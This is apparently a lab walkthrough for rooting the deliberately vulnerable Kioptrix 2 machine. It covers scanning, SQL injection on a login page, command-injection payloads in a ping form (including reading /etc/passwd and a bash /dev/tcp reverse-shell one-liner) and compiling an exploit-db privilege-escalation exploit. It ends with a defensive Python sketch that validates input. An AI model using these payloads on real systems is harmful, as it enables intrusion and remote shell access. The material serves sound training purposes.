- Download the Kioptrix 2 vulnerable machine from vulhub.
- Import the Kioptrix machine into VMware and then apply the configuration mentioned below.
- Go into the config file, search for bridged, and replace it with NAT, as shown in the screenshot below.
- Fire up the Kali and kio 2 machines.
- Finding the IP:
- Run arp-scan -l to find the kio machine's IP.
- Nmap scan:
- Started with port 80 enumeration: the Nikto scan found the web server name and exact version.
- Run dirb to find the directories available on the server.
- Found a login page.
- Tried SQL injection on it, as mentioned below:
- One of the statements gave access, as shown in the screenshot above. Now we have a ping functionality available in the application.
- Tried command injection with simple statements.
- 192.168.32.128;ls - to list current folder's files.
- Open the /etc/passwd file, since it is a Linux server:
- 192.168.32.128;cat /etc/passwd
- Now it is time to upload a reverse shell.
- 192.168.32.128;bash -i >& /dev/tcp/192.168.32.128/3333 0>&1 - enter this input, and start an nc listener before submitting it.
- The reverse shell will pop up with limited, non-admin privileges.
- PRIVILEGE ESCALATION
- Download the exploitdb exploit as mentioned below.
- Modify the exploit, as it will not work as downloaded (when you try to compile it on the victim machine, it throws an error related to lines).
- At the end of the code mentioned below, the print line is added.
- Transfer the exploit code file to the victim machine with the wget command.
- Compile it with gcc, as shown in the screenshot below.
- Give it executable permissions.
- Then run it. You are root now.
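Why the ping form accepted 192.168.32.128;ls, and the input handling that rejects it, as an added example that is not code from the Kioptrix application. It assumes the handler concatenates the submitted value into a shell command line; the function names are hypothetical, and nothing is executed.

```python
import ipaddress
import shlex

SEPARATORS = {";", "&", "&&", "|", "||"}  # tokens that start another command in sh

def shell_commands(cmdline):
    """Split a command line into the separate commands a POSIX shell would run."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token in SEPARATORS:
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands

def vulnerable_cmdline(target):
    """Assumed shape of the flawed handler: input concatenated into a shell string."""
    return "ping -c 3 " + target

def hardened_argv(target):
    """Accept only a single IP literal; return an argv list for shell-free execution."""
    addr = ipaddress.ip_address(target.strip())  # raises ValueError on anything else
    return ["ping", "-c", "3", str(addr)]  # for subprocess.run(argv), never shell=True

def check(target):
    """Return (commands the shell would run, hardened argv or None if rejected)."""
    seen = shell_commands(vulnerable_cmdline(target))
    try:
        return seen, hardened_argv(target)
    except ValueError:
        return seen, None

if __name__ == "__main__":
    # Inputs taken from the walkthrough above, plus one benign value.
    for sample in ["192.168.32.128", "192.168.32.128;ls",
                   "192.168.32.128;cat /etc/passwd"]:
        print(repr(sample), "->", check(sample))
```

Any input for which the first element holds more than one command is an injection attempt worth logging, and the hardened path returns None for it instead of building a command.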